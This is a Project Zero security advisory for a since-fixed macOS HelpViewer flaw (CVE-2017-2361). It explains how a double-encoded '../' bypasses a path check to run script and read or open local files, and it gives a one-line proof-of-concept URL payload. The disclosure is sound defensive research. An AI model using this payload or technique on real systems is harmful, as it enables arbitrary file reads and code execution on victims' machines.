Monorail Project: project-zero
Status: Fixed
Closed: Feb 2017

macOS: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
Project Member: Reported by lokihardt@google.com, Dec 14 2016
HelpViewer is an application that uses WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help

or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html

HelpViewer's WebView has an internal protocol handler "x-help-script" that can be used to open an arbitrary local file. Therefore, if we can run arbitrary JavaScript code, we win easily and, of course, we can read an arbitrary local file with an XMLHttpRequest.

HelpViewer checks whether the path of the URL is inside a valid help file or not. But we can bypass this with a double-encoded "../".

PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";

The attached poc will pop up a Calculator.

Tested on macOS Sierra 10.12.1 (16B2659).


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
poc.html
1.9 KB View Download
Project Member Comment 1 by lokihardt@google.com, Jan 20 2017
Labels: CVE-2017-2361
Project Member Comment 2 by lokihardt@google.com, Feb 2 2017
Status: Fixed
Project Member Comment 3 by lokihardt@google.com, Feb 22 2017
Labels: -Restrict-View-Commit